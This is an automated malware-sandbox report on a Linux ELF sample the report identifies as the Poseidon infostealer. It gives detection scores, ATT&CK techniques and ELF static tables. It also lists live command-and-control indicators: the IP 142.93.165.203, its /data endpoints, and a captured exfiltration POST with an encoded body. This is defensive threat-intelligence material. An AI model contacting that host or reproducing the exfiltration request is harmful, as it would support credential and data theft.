Edit tour

Linux Analysis Report
ht-jupit.elf

Overview

General Information

Sample name:ht-jupit.elf
Analysis ID:1645092
MD5:80addee529e137894328a592be4ea153
SHA1:f2a3f37ab9efb082cf1cb3111eeedc1c68cb9390
SHA256:b11d770e423563108936db7a48f19dc2dc17024adb58560885b1b2fb804e3e6c
Tags:134-199-209-199elfuser-JAMESWT_MHT
Infos:

Detection

Poseidon
Score:56
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Yara detected Poseidon
Contains symbols related to standard C library sleeps (sometimes used to evade sandboxing)
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1645092
Start date and time:2025-03-21 13:02:21 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 49s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:ht-jupit.elf
Detection:MAL
Classification:mal56.troj.linELF@0/0@2/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • Max analysis timeout: 600s exceeded, the analysis took too long
  • VT rate limit hit for: http://142.93.165.203/
  • VT rate limit hit for: http://142.93.165.203/142.93.165.203:80max-age=0
  • VT rate limit hit for: http://142.93.165.203/data
  • VT rate limit hit for: http://142.93.165.203/data3
  • VT rate limit hit for: http://142.93.165.203/datac
  • VT rate limit hit for: http://142.93.165.203/datap
  • VT rate limit hit for: http://142.93.165.203/datawo
Command:/tmp/ht-jupit.elf
PID:5430
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • ht-jupit.elf (PID: 5430, Parent: 5358, MD5: 80addee529e137894328a592be4ea153) Arguments: /tmp/ht-jupit.elf
  • cleanup
SourceRuleDescriptionAuthorStrings
ht-jupit.elfJoeSecurity_PoseidonYara detected PoseidonJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: ht-jupit.elfVirustotal: Detection: 33%Perma Link
    Source: ht-jupit.elfReversingLabs: Detection: 41%
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.93.165.203
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
    Source: unknownHTTP traffic detected: POST /data HTTP/1.1Host: 142.93.165.203User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoContent-Length: 1608Accept-Encoding: gzipConnection: closeData Raw: 4e 6a 67 32 5a 54 45 32 4f 44 51 74 4f 57 59 30 4d 53 30 30 59 54 49 35 4c 57 4a 6a 5a 44 67 74 4e 6d 59 32 4f 54 6b 30 59 7a 51 77 59 32 55 34 59 43 2b 45 6c 45 44 35 74 4b 73 42 39 54 53 77 51 42 48 50 77 30 6e 53 47 72 6b 6f 4c 57 70 59 37 47 41 54 30 61 51 45 42 59 50 33 6b 5a 70 53 7a 4b 35 71 6c 49 77 42 74 49 7a 56 2b 70 79 72 36 52 4c 34 4a 6d 65 2b 78 63 56 37 61 51 50 35 64 6e 35 46 73 57 43 6c 6b 36 38 54 62 30 42 4c 63 4b 4f 5a 31 69 68 6d 76 4a 45 34 35 62 6c 48 49 50 6e 63 71 6a 55 48 38 72 78 47 43 5a 4f 75 55 55 69 6f 4e 74 5a 5a 73 53 69 30 6b 6d 55 41 5a 2f 6c 77 52 62 30 54 4b 75 4a 78 4b 76 6a 6e 63 69 79 65 58 38 50 4f 35 56 2f 46 6d 6d 75 31 42 4a 71 61 4e 58 42 64 69 48 68 49 78 34 76 49 7a 35 68 75 51 65 50 36 7a 43 30 77 52 4d 4b 58 54 66 77 41 63 52 69 72 57 64 36 64 62 72 4c 71 4b 6c 74 30 68 73 43 6e 54 6a 41 5a 38 51 4b 78 6d 55 69 50 39 72 42 6e 55 71 59 54 6c 42 75 45 4d 46 50 68 57 30 56 30 77 58 43 56 64 6f 71 47 54 45 61 39 34 67 64 37 49 72 4c 39 30 38 46 39 61 41 4d 72 6b 6e 58 63 69 68 64 61 74 2f 50 52 6e 78 59 65 54 51 2f 49 70 79 45 61 41 32 6b 72 34 74 4d 39 45 6d 4f 64 41 75 76 38 2f 39 31 70 4f 55 33 4d 4a 70 53 53 6a 42 54 61 39 45 4f 43 34 77 38 7a 63 2f 53 54 77 44 39 59 59 73 6d 59 38 7a 33 31 47 74 57 43 33 30 37 79 36 70 62 46 45 62 43 6e 51 6e 56 44 50 51 76 65 48 34 35 43 2f 36 43 7a 2f 38 35 63 43 6e 71 31 69 6c 4a 68 79 73 70 6c 52 42 52 4a 66 6e 32 2b 42 59 4e 62 31 62 70 30 49 73 4e 6a 77 6c 4f 74 43 52 66 33 34 6a 70 78 35 7a 41 62 6f 30 54 44 34 39 55 69 44 58 57 36 4e 43 50 32 62 5a 47 70 78 36 62 38 58 77 48 4f 48 4d 53 2f 59 2b 71 73 44 65 33 67 4e 76 6f 79 58 37 49 68 43 6a 32 39 55 48 73 51 55 4a 51 55 68 35 6c 57 41 61 70 6e 53 51 31 54 47 65 64 6e 79 51 74 5a 37 46 30 51 6f 6f 6e 6e 4e 71 55 30 35 6b 48 38 67 6d 6f 54 77 7a 45 38 42 63 55 73 69 4f 6b 4d 77 34 63 6c 58 58 54 61 6c 64 7a 34 6f 72 73 55 39 75 4c 44 54 2b 55 63 59 76 41 59 52 71 76 4b 43 37 65 45 53 6a 73 43 74 53 47 4e 2b 65 45 66 68 2f 6c 49 6f 73 41 4c 48 4c 39 50 57 2f 42 65 4d 56 38 4e 36 69 31 35 74 61 67 31 6a 4f 65 42 54 57 38 44 2b 4e 4f 65 34 33 4f 44 53 79 72 31 57 34 7a 65 4f 65 4e 69 64 6e 34 36 77 4f 37 43 33 33 4d 33 35 57 49 65 4f 57 74 4c 4b 47 33 32 6a 67 38 36 59 61 66 65 63 31 31 47 76 2b 5a 56 4a 4b 4a 34 51 64 55 56 78 2b 59 36 48 46 6f 51 45 43 44 59 55 37 2b 70 70 4b 36 51 55 45 59 45 66 42 47 38 57 70 34 67 65 68 65 71 6b 65 62 6c 78 51 41 50 77 69 74 35 2b 61 47 44 49 38 6a 57 76 47 2b 35 73 64 58 66 56 64 44 45 4d 67 36 49 4d 68 6f 31 58 35 58 4a 6c 69 7a 71 55 4d 70 43 31 62 30 35 54 73 47 69 46 36 43 44 42 6f 6e 41 77 77 30 51 4e 4f 30 69 78 50 64 64 6e 50 2b 34 75 35 6a 4a 6c 46 44 74 59 70 54 76 73 65 54 78 38 7a 67 35 45 57 6e 30 30 44 48 30 70 4f 61 43 50 6f 42 4c 6b 72 65 39 58 31 53 79 34 71 67 6a
    Source: ht-jupit.elfELF static info symbol of initial sample: freeaddrinfo
    Source: ht-jupit.elfELF static info symbol of initial sample: gai_strerror
    Source: ht-jupit.elfELF static info symbol of initial sample: getaddrinfo
    Source: ht-jupit.elfELF static info symbol of initial sample: getnameinfo
    Source: ht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://142.93.165.203/
    Source: ht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://142.93.165.203/142.93.165.203:80max-age=0
    Source: ht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://142.93.165.203/RSA
    Source: ht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://142.93.165.203/data
    Source: ht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://142.93.165.203/data3
    Source: ht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://142.93.165.203/dataY
    Source: ht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://142.93.165.203/datac
    Source: ht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://142.93.165.203/dataindows
    Source: ht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://142.93.165.203/datap
    Source: ht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://142.93.165.203/datawo
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: classification engineClassification label: mal56.troj.linELF@0/0@2/0
    Source: ELF file sectionSubmission: ht-jupit.elf
    Source: ELF symbol in initial sampleSymbol name: nanosleep
    Source: /tmp/ht-jupit.elf (PID: 5430)Queries kernel information via 'uname': Jump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: ht-jupit.elf, type: SAMPLE

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: ht-jupit.elf, type: SAMPLE
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
    Virtualization/Sandbox Evasion
    OS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local System2
    Non-Application Layer Protocol
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media2
    Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1645092 Sample: ht-jupit.elf Startdate: 21/03/2025 Architecture: LINUX Score: 56 8 142.93.165.203, 44272, 44274, 44276 DIGITALOCEAN-ASNUS United States 2->8 10 daisy.ubuntu.com 2->10 12 Multi AV Scanner detection for submitted file 2->12 14 Yara detected Poseidon 2->14 6 ht-jupit.elf 2->6         started        signatures3 process4
    SourceDetectionScannerLabelLink
    ht-jupit.elf34%VirustotalBrowse
    ht-jupit.elf42%ReversingLabsLinux.Infostealer.PoSeidon
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches

    Download Network PCAP: filteredfull

    NameIPActiveMaliciousAntivirus DetectionReputation
    daisy.ubuntu.com
    162.213.35.25
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://142.93.165.203/datafalse
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://142.93.165.203/datawoht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpfalse
          unknown
          http://142.93.165.203/ht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpfalse
            unknown
            http://142.93.165.203/142.93.165.203:80max-age=0ht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              unknown
              http://142.93.165.203/data3ht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                unknown
                http://142.93.165.203/datacht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                  unknown
                  http://142.93.165.203/datapht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                    unknown
                    http://142.93.165.203/dataYht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                      unknown
                      http://142.93.165.203/RSAht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                        unknown
                        http://142.93.165.203/dataindowsht-jupit.elf, 5430.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          142.93.165.203
                          unknownUnited States
                          14061DIGITALOCEAN-ASNUSfalse
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          daisy.ubuntu.commain_x86.elfGet hashmaliciousUnknownBrowse
                          • 162.213.35.24
                          miner.elfGet hashmaliciousUnknownBrowse
                          • 162.213.35.24
                          main_x86_64.elfGet hashmaliciousUnknownBrowse
                          • 162.213.35.25
                          Contract Invoice Approval.pdfGet hashmaliciousUnknownBrowse
                          • 162.213.35.25
                          sshd.elfGet hashmaliciousUnknownBrowse
                          • 162.213.35.25
                          resgod.m68k.elfGet hashmaliciousMiraiBrowse
                          • 162.213.35.24
                          resgod.sh4.elfGet hashmaliciousMiraiBrowse
                          • 162.213.35.25
                          resgod.x86.elfGet hashmaliciousMiraiBrowse
                          • 162.213.35.25
                          resgod.ppc.elfGet hashmaliciousMiraiBrowse
                          • 162.213.35.24
                          resgod.arm.elfGet hashmaliciousMiraiBrowse
                          • 162.213.35.25
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          DIGITALOCEAN-ASNUSulinux-logs.elfGet hashmaliciousPoseidonBrowse
                          • 161.35.85.95
                          http://t.dripemail2.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzQyNDg1MjAxLCJuYmYiOjE3NDI0ODUyMDEsImFjY291bnRfaWQiOiI5MjExNzMxIiwiZGVsaXZlcnlfaWQiOiI2ZGY2cmIydXVwbjY4cnNhdWo0NCIsInRva2VuIjoiNmRmNnJiMnV1cG42OHJzYXVqNDQiLCJzZW5kX2F0IjoxNzQyNDgzOTQ4LCJlbWFpbF9pZCI6MTA1MDc4ODcsImVtYWlsYWJsZV90eXBlIjoiQnJvYWRjYXN0IiwiZW1haWxhYmxlX2lkIjo0MTkzMDc4LCJ1cmwiOiJodHRwOi8vZ2NyLnVwcGxleC5jby5rZT9fX3M9cWMwZ2JsdTk1emZnYmh3ZHp5OG4mdXRtX3NvdXJjZT1kcmlwJnV0bV9tZWRpdW09ZW1haWwmdXRtX2NhbXBhaWduPVdlK2dvdCthK21ha2VvdmVyLiJ9.nJ9tzd3-jhbWgSNwRLHamHKYwZXuNcZIG2E1QBFM5fgGet hashmaliciousHTMLPhisherBrowse
                          • 162.243.170.173
                          resgod.arm.elfGet hashmaliciousMiraiBrowse
                          • 46.101.242.253
                          resgod.mips.elfGet hashmaliciousMiraiBrowse
                          • 134.209.166.100
                          message_v2.zipGet hashmaliciousUnknownBrowse
                          • 157.245.72.142
                          i686.elfGet hashmaliciousMiraiBrowse
                          • 157.230.180.187
                          i486.elfGet hashmaliciousMiraiBrowse
                          • 165.227.55.112
                          sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 68.183.122.246
                          mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 68.183.122.246
                          x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 68.183.122.246
                          No context
                          No context
                          No created / dropped files found
                          File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=1cfc28c1871feb2b8cd7f2b32346f7b57863a01b, for GNU/Linux 3.2.0, stripped
                          Entropy (8bit):6.202817295353319
                          TrID:
                          • ELF Executable and Linkable format (Linux) (4029/14) 49.77%
                          • ELF Executable and Linkable format (generic) (4004/1) 49.46%
                          • Lumena CEL bitmap (63/63) 0.78%
                          File name:ht-jupit.elf
                          File size:8'158'184 bytes
                          MD5:80addee529e137894328a592be4ea153
                          SHA1:f2a3f37ab9efb082cf1cb3111eeedc1c68cb9390
                          SHA256:b11d770e423563108936db7a48f19dc2dc17024adb58560885b1b2fb804e3e6c
                          SHA512:8e87a35e89da5029ea019e444d861d6726010162c9fa1b7f62ddd9b40204b238bc79f674ff127c13acbee9524d2a43afa818f8710de69173fed96d73af7b697f
                          SSDEEP:49152:kUZYhGZ9/HqXv9stcmRJxSZeRSGZRFSET0qBiPpFNyMFRD/5EEHpchbKflKtMMFi:knKE9Xm7RSARBLMFRDREUctLme
                          TLSH:28864943ECA545E8C1ADD2348A669263BA717C494F3063D32B50F7782F77BD0AAB9344
                          File Content Preview:.ELF..............>......#@.....@.......hs|.........@.8...@.".!.........@.......@.@.....@.@...............................................@.......@...............................................@.......@...................................... ....... @....

                          ELF header

                          Class:ELF64
                          Data:2's complement, little endian
                          Version:1 (current)
                          Machine:Advanced Micro Devices X86-64
                          Version Number:0x1
                          Type:EXEC (Executable file)
                          OS/ABI:UNIX - System V
                          ABI Version:0
                          Entry Point Address:0x4023f0
                          Flags:0x0
                          ELF Header Size:64
                          Program Header Offset:64
                          Program Header Size:56
                          Number of Program Headers:12
                          Section Header Offset:8156008
                          Section Header Size:64
                          Number of Section Headers:34
                          Header String Table Index:33
                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                          NULL0x00x00x00x00x0000
                          .interpPROGBITS0x4002e00x2e00x1c0x00x2A001
                          .note.gnu.build-idNOTE0x4002fc0x2fc0x240x00x2A004
                          .note.ABI-tagNOTE0x4003200x3200x200x00x2A004
                          .gnu.hashGNU_HASH0x4003400x3400x340x00x2A508
                          .dynsymDYNSYM0x4003780x3780x6300x180x2A618
                          .dynstrSTRTAB0x4009a80x9a80x3300x00x2A001
                          .gnu.versionVERSYM0x400cd80xcd80x840x20x2A502
                          .gnu.version_rVERNEED0x400d600xd600x700x00x2A638
                          .rela.dynRELA0x400dd00xdd00x480x180x2A508
                          .rela.pltRELA0x400e180xe180x5700x180x42AI5268
                          .initPROGBITS0x4020000x20000x170x00x6AX004
                          .pltPROGBITS0x4020200x20200x3b00x100x6AX0016
                          .textPROGBITS0x4023e00x23e00x3b98c10x00x6AX0032
                          .finiPROGBITS0x7bbca40x3bbca40x90x00x6AX004
                          .rodataPROGBITS0x7bc0000x3bc0000x1896b00x00x2A0032
                          .typelinkPROGBITS0x9456c00x5456c00x28480x00x2A0032
                          .itablinkPROGBITS0x947f200x547f200xee00x00x2A0032
                          .gopclntabPROGBITS0x948e000x548e000x2383000x00x2A0032
                          .eh_frame_hdrPROGBITS0xb811000x7811000x1c40x00x2A004
                          .eh_framePROGBITS0xb812c80x7812c80x8d80x00x2A008
                          .tbssNOBITS0xb82de80x781de80x80x00x403WAT008
                          .init_arrayINIT_ARRAY0xb82de80x781de80x80x80x3WA008
                          .fini_arrayFINI_ARRAY0xb82df00x781df00x80x80x3WA008
                          .dynamicDYNAMIC0xb82df80x781df80x1f00x100x3WA608
                          .gotPROGBITS0xb82fe80x781fe80x180x80x3WA008
                          .got.pltPROGBITS0xb830000x7820000x1e80x80x3WA008
                          .dataPROGBITS0xb832000x7822000x121f00x00x3WA0032
                          .go.buildinfoPROGBITS0xb953f00x7943f00xbf00x00x3WA0016
                          .noptrdataPROGBITS0xb95fe00x794fe00x322220x00x3WA0032
                          .bssNOBITS0xbc82200x7c72020x22b400x00x3WA0032
                          .noptrbssNOBITS0xbead600x7c72020xe1b00x00x3WA0032
                          .commentPROGBITS0x00x7c72020x270x10x30MS001
                          .shstrtabSTRTAB0x00x7c72290x13b0x00x0001
                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                          PHDR0x400x4000400x4000400x2a00x2a02.03640x4R 0x8
                          INTERP0x2e00x4002e00x4002e00x1c0x1c3.94080x4R 0x1/lib64/ld-linux-x86-64.so.2.interp
                          LOAD0x00x4000000x4000000x13880x13882.89100x4R 0x1000.interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt
                          LOAD0x20000x4020000x4020000x3b9cad0x3b9cad6.16820x5R E0x1000.init .plt .text .fini
                          LOAD0x3bc0000x7bc0000x7bc0000x3c5ba00x3c5ba05.66870x4R 0x1000.rodata .typelink .itablink .gopclntab .eh_frame_hdr .eh_frame
                          LOAD0x781de80xb82de80xb82de80x4541a0x761285.08230x6RW 0x1000.tbss .init_array .fini_array .dynamic .got .got.plt .data .go.buildinfo .noptrdata .bss .noptrbss
                          DYNAMIC0x781df80xb82df80xb82df80x1f00x1f01.57870x6RW 0x8.dynamic
                          NOTE0x2fc0x4002fc0x4002fc0x440x443.39670x4R 0x4.note.gnu.build-id .note.ABI-tag
                          TLS0x781de80xb82de80xb82de80x00x80.00000x4R 0x8.tbss
                          GNU_EH_FRAME0x7811000xb811000xb811000x1c40x1c44.58390x4R 0x4.eh_frame_hdr
                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                          GNU_RELRO0x781de80xb82de80xb82de80x2180x2181.57040x4R 0x1.tbss .init_array .fini_array .dynamic .got
                          TypeMetaValueTag
                          DT_NEEDEDsharedliblibpthread.so.00x1
                          DT_NEEDEDsharedliblibresolv.so.20x1
                          DT_NEEDEDsharedliblibc.so.60x1
                          DT_INITvalue0x4020000xc
                          DT_FINIvalue0x7bbca40xd
                          DT_INIT_ARRAYvalue0xb82de80x19
                          DT_INIT_ARRAYSZbytes80x1b
                          DT_FINI_ARRAYvalue0xb82df00x1a
                          DT_FINI_ARRAYSZbytes80x1c
                          DT_GNU_HASHvalue0x4003400x6ffffef5
                          DT_STRTABvalue0x4009a80x5
                          DT_SYMTABvalue0x4003780x6
                          DT_STRSZbytes8160xa
                          DT_SYMENTbytes240xb
                          DT_DEBUGvalue0x00x15
                          DT_PLTGOTvalue0xb830000x3
                          DT_PLTRELSZbytes13920x2
                          DT_PLTRELpltrelDT_RELA0x14
                          DT_JMPRELvalue0x400e180x17
                          DT_RELAvalue0x400dd00x7
                          DT_RELASZbytes720x8
                          DT_RELAENTbytes240x9
                          DT_VERNEEDvalue0x400d600x6ffffffe
                          DT_VERNEEDNUMvalue30x6fffffff
                          DT_VERSYMvalue0x400cd80x6ffffff0
                          DT_NULLvalue0x00x0
                          NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                          .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                          RunMain.dynsym0x7bac2060FUNC<unknown>DEFAULT13
                          __errno_locationGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          __gmon_start__.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                          __libc_start_mainGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          __res_searchGLIBC_2.2.5libresolv.so.2.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          _cgo_panic.dynsym0x48c3e045FUNC<unknown>DEFAULT13
                          _cgo_topofstack.dynsym0x47612025FUNC<unknown>DEFAULT13
                          abortGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          crosscall2.dynsym0x48c460104FUNC<unknown>DEFAULT13
                          fprintfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          fputcGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          freeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          freeaddrinfoGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          fwriteGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          gai_strerrorGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          getaddrinfoGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          getegidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          geteuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          getgidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          getgrgid_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          getgrnam_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          getgrouplistGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          getnameinfoGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          getpwnam_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          getpwuid_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          getuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          mallocGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          mmapGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          munmapGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          nanosleepGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_attr_destroyGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_attr_getstackGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_attr_getstacksizeGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_attr_initGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_cond_broadcastGLIBC_2.3.2libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_cond_waitGLIBC_2.3.2libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_createGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_detachGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_getattr_npGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_key_createGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_mutex_lockGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
